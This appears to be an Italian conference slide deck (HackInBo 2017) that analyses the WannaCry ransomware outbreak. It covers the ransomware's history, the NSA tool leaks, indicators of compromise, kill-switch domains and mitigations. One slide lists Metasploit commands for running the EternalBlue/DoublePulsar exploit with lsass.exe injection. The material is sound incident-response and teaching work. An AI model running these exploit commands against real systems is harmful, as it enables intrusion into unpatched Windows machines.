Il venerdì nero di wannacry

Il Venerdì nero di Wannacry
Gianni ‘guelfoweb’ Amato Bologna, 14 Ottobre 2017
HackInBo

HackInBo Winter Edition 2017
About me
● Name: Gianni Amato
● Nickname: guelfoweb
● Email: guelfoweb@gmail.com
● Web: www.guelfoweb.com
● Twitter: @guelfoweb

Agenda
● Ransomware
○ Come li avevamo conosciuti
○ Come si sono evoluti
● Leak
○ CIA
○ NSA
● Il weekend nero
○ Analisi di Wannacry
○ Evoluzioni

Ransomware: Come li conoscevamo

C’era una volta MBR Lock
...correva l’anno 2012
● Master Boot Record compromesso;
● MBR originale sostituito con MBR proprietario;
● Dati sul disco integri, sistema non è accessibile;
● Per ottenere la password era necessario chiamare un
numero a pagamento per ricevere il codice (c0d3).

Soluzione
● Era sufficiente ripristinare il
Master Boot Record per
accedere al sistema.
● Analisi successive hanno
dimostrato che il codice accetta
come password qualsiasi stringa
composta da 14 cifre.

Ransomware: Come si sono evoluti

Varianti 2014 - 2015
2014 - CTB Locker
● utilizza Tor per raggiungere il C&C
● componenti Tor embedded
● distribuito tramite Drive-by download e Spam
2015 - TeslaCrypt
● destinato alla cummunity di videogiochi, successivamente esteso ai classici documenti
● elimina le Shadow Copy e i punti di ripristino
● distribuito attraverso i kit di Angler, Sweet Orange e Nuclear exploit.
Download inconsapevole:
● Pop-up
● Error message
● Redirect
● Exploit

Varianti 2015 - 2016
2015 - 2016 – MSIL
● sfrutta i server Web vulnerabili Java (JBoss obsolete)
● funzionalità di trojan
● utilizza psexec.exe per veicolare il malware verso host della stessa rete
2016 – Locky
● si propaga attraverso messaggi di posta elettronica
● allegati MS Office (macro) o compressi (.rar, .zip) con JS
● distribuito utilizzando il kit Nuclear Exploit

Tecniche di evasione
● Differenti vettori di infezione
○ Exploit Kit
● Offuscamento del codice
○ Codifica
● Riconoscimento dell’ambiente
○ Fisico, virtuale, sandbox
● Rilevamento dei tool di analisi in esecuzione sul sistema
○ Strumenti di debug e di monitoraggio del traffico

Scripting
L'uso di tecniche di scripting non è nuovo (VBS, HTA, JS, PS)
● facili da offuscare
● difficili da individuare
● nella maggior parte dei casi sono dei downloader
● spesso richiamano altri script
● tutelano il malware vero e proprio
https://a.pomfe.co/lmvkqth.jpg
https://infosec.cert-pa.it/analyze/e10bdb0fe7ad6fed9e8dcc4418aede45.html

Locky encoded
https://gist.github.com/guelfoweb/1b7c4ecc3a2a7d8947ad

Ransomware + Exploit Kit

Leak: Armi digitali trafugate a CIA e NSA

Marble Framework
Marzo 2017 - Set di strumenti in grado di:
● Offuscare codice nocivo;
● Implementare tecniche Anti-Forensics.
Allo scopo di:
● Mascherare malware, trojan e attacchi di hacking;
● Evitare che un attacco possa essere ricondotto alla CIA.

Vault7: Source Code
● Russo
● Cinese
● Arabo
● Farsi
Mascherare gli hack della CIA e concentrare l’attenzione degli investigatori su altri Paesi.

Hacking Tools
● The Shadow Brokers
○ Equation Group
■ NSA
Il primo annuncio del leak risale al 13
agosto 2016 (via twitter)

MS16-114 - SMB 1.0 Protocollo Obsoleto!
Il 13 settembre 2016 - appena un mese dopo l’annuncio del leak - Microsoft informa gli utenti di una
importante vulnerabilità che affligge il protocollo SMB 1.0 e che consentirebbe l’esecuzione di codice
remoto.
Per ragioni di sicurezza Microsoft invita gli utenti a disabilitare il protocollo obsoleto.
“If you have not already, follow the instructions in the blog to turn off SMB1 in your environment. You do
not need this 30-year-old protocol, and you certainly do not want it.” - Microsoft.

MS17-101 - SMB 1.0 Patch
Il 14 marzo 2017 Microsoft rilascia un aggiornamento risolutivo per la vulnerabilità nel protocollo SMB
1.0 annunciata nel settembre 2016.

Eternal*
14 Aprile 2017 – Microsoft dirama i risultati di
analisi interne che riguardano la pubblicazione di
alcuni exploit sottratti a «Equation Group» (NSA)
rilasciati pubblicamente da un gruppo di hacker
noto come «The Shadow Brokers».

The Black Friday: WannaCry

Venerdì, 12 Maggio 2017
CCN-CERT (Spagna)
Il primo CERT, almeno in Europa, a diramare la
notizia di un attacco massivo è il CERT spagnolo.
https://www.ccn-cert.cni.es/seguridad-al-dia/comunic
ados-ccn-cert/4464-ataque-masivo-de-ransomware-q
ue-afecta-a-un-elevado-numero-de-organizaciones-es
panolas.html

È questione di minuti...
● Telefonate
● Messaggi
● Email
● Collaborazione tra CERT
a livello europeo;
● Infosharing tra CERT
italiani.
● Infosharing con Vendor
● Collaborazione tra ricercatori
di tutto il mondo;
● Public infosharing su Twitter,
AlienVault (IoC), GitHub.

Cosa emerge dalle prime informazioni
Sistemi affetti:
● Microsoft Windows Vista SP2
● Windows Server 2008 SP2 e R2 SP1
● Windows 7
● Windows 8.1
● Windows RT 8.1
● Windows Server 2012 e R2
● Windows 10
● Windows Server 2016
Sistemi affetti fuori supporto:
● Microsoft Windows XP

Quali danni ha provocato?
● 300.000 (?) computer compromessi in oltre 150 paesi in meno di 24 ore;
● In Spagna è stata confermata la compromissione di grosse aziende tra cui la compagnia di
telecomunicazioni "Telefonica";
● In Gran Bretagna pare che il ransomware abbia preso in ostaggio i PC di alcuni ospedali e strutture
sanitarie.

Phishing o Worm?
Si presume che il malware si sia propagato inizialmente tramite posta elettronica, ma al momento non
esiste una traccia ufficiale in circolazione che confermi l'ipotesi.
Non è ancora stato individuato il paziente zero.

Come lavora?
● Sfrutta l'exploit di Equation Group (NSA) noto come "EternalBlue" applicabile al protocollo
Windows SMB.
● Una volta infettata una macchina, il malware provvede a scansionare la rete interna alla ricerca di
altre postazioni affette dalla medesima vulnerabilità.
● Individuata la postazione vulnerabile viene eseguito l'exploit per ottenere accesso al sistema e
successivamente cifra i file in esso contenuti rinominandoli con estensione ".WCRY".
● Per recuperare i dati in ostaggio viene chiesto un riscatto iniziale di 300$ in bitcoin, il prezzo sale
man mano che scorre il conto alla rovescia del timer mostrato all'utente.

Esistono soluzioni?
● Installare la patch MS17-010;
● Bloccare SMB 1 e 2;
● Mitigare la contaminazione sfruttando al meglio
gli IoC.
○ Hash, Imphash, IP, Domain, Registry key,
Prima informativa sul sito ufficiale CERT-PA
● https://www.cert-pa.it/web/guest/news?id=8342

Sample su sandbox online
La presenza online del primo sample su Malwr risale al 12/05/2017 @ 10:19
Dalle analisi automatiche nelle sandbox online non emergono evidenti informazioni relative alla
propagazione.
● https://malwr.com/analysis/MTlhYjAzNTExNjllNGU0YThmMTRlZTRiOWE4YzhkZDI/
● https://www.reverse.it/sample/24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703
480b1022c?environmentId=100

Analisi preliminari
Nome dominio (non registrato)

Infosec analysis

Monitoraggio delle informazioni

IoC Sharing
Problematiche riscontrate:
● Verifica dell’attendibilità
● Formati differenti
● Conversione in formato testuale
● Separatori improvvisati
● Rimozione dei duplicati
● Gestione dei feedback

Hashr
● È un tool scritto e mantenuto dagli analisti
del CERT-PA
● Consente di computare hash dei file e
ricercare corrispondenza su una lista di hash
predefinita (ad esempio IoC di hash);
● Distributito alla constituency;
● Tipologie di ricerche
○ ricorsive
○ per tipologia di file
● Non è di pubblico dominio

Microsoft rilascia Patch per Windows XP
https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

Kill-Switch
● ayylmaotjhsstasdfasdfasdfasdfasdfasdfasdf[.]com
● ifferfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com
● iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com
● iuqerfsodp9ifjaposdfjhgosurijfaewrwergweb[.]com
● iuqerssodp9ifjaposdfjhgosurijfaewrwergwea[.]com
● iuqssfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com
Un eroe per caso?

Nuove varianti
Poche ore dopo la notizia dell’esistenza di un
kill-switch, si ha evidenza di nuovi sample:
● con kill-switch differenti
● senza kill-switch

Kill-Switch e Proxy
INTERNET_OPEN_TYPE_DIRECT
(Resolves all host names locally.)
https://blog.didierstevens.com/2017/05/13/quickp
ost-wcry-killswitch-check-is-not-proxy-aware/

Sezione Resource
La sezione «Resource» contiene un eseguibile, un pacchetto di circa 3,5 MB
https://infosec.cert-pa.it/analyze/db349b97c37d22f5ea1d1841e3c89eb4.html

MSSECSVC2.0
Il worm installa un servizio denominato “mssecsvc2.0”.
Nome visualizzato: “Microsoft Security Center (2.0) service”.
Quando il servizio è installato provvede a caricare i moduli per la
cifratura.

Network traffic
● Tenta di connettersi alla rete locale alla ricerca di SMB
vulnerabile;
● Genera indirizzi IP pubblici casuali per lo stesso scopo;
● Se trova una postazione vulnerabile, viene trasferito il
malware ed eseguito su di esso.
path/to/mssecsvc -m security

Folder dropped
Public Key
Private Key

Persistenza
HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun

Da analisi successive
● Cifra 177 tipologie di file
● .wnry, .wcry, .wncry, .wncrypt
● RSA-2048 encryption keys with AES-128 encryption
● SMB Exploit (MS-17010) EternalBlue
● Sezione Resources contiene un pacchetto eseguibile
● TOR C&C
● Diversi indirizzi Bitcoin
● DNS Kill-Switch
● Persistenza garantita tramite registro di sistema

Informazioni condivise
● News
○ https://www.cert-pa.it/web/guest/news?id=8342
● News
○ https://www.cert-pa.it/web/guest/news?id=8382
● Info
○ https://www.cert-pa.it/documents/10184/0/Consigli_WCry_CERT-PA6.pdf
● IoC
○ https://www.cert-pa.it/documents/10184/0/WCry.IoC.015.infosharing.xlsx

EternalBlue e Metasploit
● msf > use windows/smb/eternalblue_doublepulsar
● msf > exploit (eternalblue_doublepulsar) > set eternalbluepath
root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps
● msf > exploit (eternalblue_doublepulsar) > set doublepulsarpath
root/Desktop//Eternalblue-Doublepulsar-Metasploit/deps
● msf > exploit (eternalblue_doublepulsar) > set targetarchitecture x64
● msf > exploit (eternalblue_doublepulsar) > set processinject lsass.exe
● msf > exploit (eternalblue_doublepulsar) > set lhost 192.168.1.2
● msf > exploit (eternalblue_doublepulsar) > set rhost 192.168.1.3
● msf > exploit (eternalblue_doublepulsar) > exploit

EternalRocks – WannaCry Evolution
● EternalRocks è la versione avanzata di WannaCry
● Oltre gli exploit di WannaCry (EternalBlue e DoublePulsar) sfrutta altri exploit:
○ EternalChampion;
○ EternalRomance;
○ EternalSynergy;
○ ArchiTouch;
○ SMBTouch.

EternalRocks in due Step
● 1° STEP: Download TOR client per raggiungere il C&C
● 2° STEP: Dopo 24h arriva la risposta dal C&C che invia un pacchetto denominato
«shadowbrokers.zip»

EternalRocks nuova variante

Similitudini
Neel Mehta, ricercatore di Google, ha trovato
alcune somiglianze tra una delle prime varianti di
WannaCry e una Backdoor usata in passato dal
gruppo hacker Lazarus, noto per gli attacchi del
2014 contro Sony.
Si ritiene, ma non vi è conferma, che il gruppo
Lazarus fosse legato alla Corea del Nord. Symantec
ha approfondito l’argomento riportando alcune
evidenze.

Chi sono i colpevoli?
I veri colpevoli sono coloro i quali hanno lasciato esposti
e vulnerabili i propri sistemi.

Grazie per l’attenzione!

Il venerdì nero di wannacry

More Related Content

What's hot (11)

Similar to Il venerdì nero di wannacry (6)

More from Gianni Amato (13)

Il venerdì nero di wannacry